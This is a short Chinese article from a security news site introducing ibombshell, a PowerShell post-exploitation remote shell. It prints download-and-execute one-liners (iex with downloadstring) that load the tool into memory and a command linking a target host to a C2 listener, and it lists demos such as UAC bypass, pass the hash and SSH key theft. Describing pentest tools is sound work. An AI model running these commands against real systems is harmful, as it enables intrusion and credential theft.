今天給大家介紹的是一款名叫ibombshell的動態遠程Shell工具,該工具基於Powershell開發,可在後滲透利用階段發揮其作用。
ibombshell介紹
ibombshell本身是一個shell,但是它能夠直接下載進目標設備的內存中,並給研究人員提供大量的滲透測試功能,這些功能是直接加載進內存的,並以Powershell函數的形式提供給測試人員,也就是說,這些功能"走到哪裡"都能夠直接執行。
除此之外,ibombshell還提供了一種名叫Silently的二級執行模式,所以滲透測試人員可以執行一個ibombshell實例(名叫warrior),被入侵的主機將會通過HTTP鏈接到一個C2控制面板,因此測試人員就可以通過控制warrior來實現對目標主機的滲透。
工具要求
為了發揮ibombshell的完整功能,首先要求的是Powershell 3.0及以上版本,如果你用的不是Windows,你可以閱讀下面這篇文章來實現在任意系統上使用Powershell。
https://github.com/PowerShell/PowerShell
如果你想以Silently模式運行ibombshell,你還需要Python 3.6以及其他的一些Python庫,安裝命令如下:
cd ibombshell\\ c2/
pip install -r requirements.txt
工具使用
ibombshell主要有兩種執行模式:
第一種名叫"ibombshell everywhere"模式,你可以直接在Powershell上加載ibombshell:
iex (new-objectnet.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
然後運行下載下來的ibombshell控制檯:
console
第二種名叫"ibombshell silently"模式,當前版本允許我們運行ibombshell控制檯並通過C2控制面板來實現遠程訪問。首先你需要在Powershell中啟動控制檯進程:
iex (new-objectnet.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
設置好ibombshell的C2路徑:
python3 ibombshell.py
創建一個監聽器,並與warrior相連:
iBombShell>load modules/listener.py
[+]Loading module...
[+]Module loaded!
iBombShell[modules/listener.py]>run
默認的監聽端口為8080,然後在主機上以Silently模式啟動控制檯,並獲取到遠程控制權限:
console-Silently -uriConsole http://[ip or domain]:[port]
ibombshell C2機制
ibombshell控制面板的基本運行機制如下圖所示:
Docker
我們還為用戶提供了專門的Docker容器,你可以使用下列命令來使用它:
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell
工具使用演示
iBombShell:PoC Warrior + Bypass UAC + Pass the hash
iBombShell:macOS
ibombshell:Extracting Private SSH Keys on Windows 10
iBombShell:PoC savefunctions
稿源:FreeBuf.COM